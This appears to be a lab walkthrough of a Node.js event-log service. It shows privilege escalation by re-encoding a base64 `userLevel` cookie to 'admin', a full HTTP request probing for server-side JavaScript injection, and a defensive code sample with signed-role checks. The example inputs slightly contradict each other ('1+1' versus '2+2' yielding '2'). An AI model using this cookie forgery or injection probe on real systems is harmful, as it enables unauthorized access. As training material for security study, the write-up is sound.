# 3000 - Web Services

#### Weak authentication

This seems to be an event system that allows us to message an administrator. We can easily create a new user via the `Register` link. Once registered and logged in, we are able to add a new log event under the `New Event Log` tab. However, when we try to submit the new event, the system prompts that "Only the admin can update the Event logs".

One interesting thing to notice is the presence of a `userLevel` cookie with the value `ZGVmYXVsdA%3D%3D`. Let's try to base64-decode the string:

```
kali@kali:~$ echo "ZGVmYXVsdA==" | base64 --decode
default
```

This decodes as `default`, which may refer to our access level. Let's try to update the `userLevel` cookie with a new value:

```
kali@kali:~$ echo -n admin | base64
YWRtaW4=
```

With this modification in place, we can now send messages.
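The underlying flaw is that the server trusts a role supplied by the client, and base64 is an encoding, not a protection. As an added example (not code from the application or the original walkthrough), the sketch below contrasts a check that trusts the decoded `userLevel` cookie with two server-side alternatives: reading the role from session state, and verifying an HMAC that binds the role to the session. The function names, the `SECRET` key, the `sid` cookie name and the `sessions` map are hypothetical.

```javascript
const { createHmac, timingSafeEqual } = require('node:crypto');

// Constructed sample data; every name here is hypothetical, not from the application.
const SECRET = 'constructed-demo-key'; // a real key would come from a secret store
const sessions = new Map([['sid-123', { user: 'demo', role: 'default' }]]);
const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');

// Weak pattern: the role is whatever the client-sent cookie decodes to.
function isAdminWeak(cookies) {
  const raw = decodeURIComponent(cookies.userLevel || '');
  return Buffer.from(raw, 'base64').toString('utf8') === 'admin';
}

// Hardened option 1: ignore the cookie and read the role from server-side session state.
function isAdminFromSession(cookies) {
  const session = sessions.get(cookies.sid);
  return session !== undefined && session.role === 'admin';
}

// Hardened option 2: if the role must live in a cookie, bind it to the session with an HMAC.
function mac(sid, role) {
  return createHmac('sha256', SECRET).update(`${sid}|${role}`).digest();
}

function signRole(sid, role) {
  return `${b64(role)}.${mac(sid, role).toString('hex')}`;
}

// Returns the role only when the tag matches this session; otherwise null.
function verifyRole(sid, cookieValue) {
  const [encoded, tag] = String(cookieValue).split('.');
  if (!encoded || !tag) return null;
  const role = Buffer.from(encoded, 'base64').toString('utf8');
  const given = Buffer.from(tag, 'hex');
  const expected = mac(sid, role);
  if (given.length !== expected.length || !timingSafeEqual(given, expected)) return null;
  return role;
}

// Demo with the cookie value shown on this page.
console.log(isAdminWeak({ userLevel: 'YWRtaW4=' }));                        // true
console.log(isAdminFromSession({ sid: 'sid-123', userLevel: 'YWRtaW4=' })); // false
console.log(verifyRole('sid-123', 'YWRtaW4='));                             // null
```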

The next interesting find is the `add technical details/code if required` Event Message. Considering that this is a Node.js application, it might be possible to inject JavaScript code.

```
3000/tcp  open  http    syn-ack ttl 63 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
```

To test this, we'll send a simple `1+1` operation as an "Event Message".

Request Used:

```http
POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=khjkhk&msg=2%2B2
```

Note the `userLevel` cookie in this request, which we exploit by replacing its value with a different base64-encoded string.

![Send event](https://offsec-platform.s3.amazonaws.com/walkthroughs-images/PG_Practice_41_image_1_xEnsZaqK.png)

After reviewing the resulting stored message, we confirm that it actually saved `2`.

![Event result](https://offsec-platform.s3.amazonaws.com/walkthroughs-images/PG_Practice_41_image_2_wGgEOnE8.png)


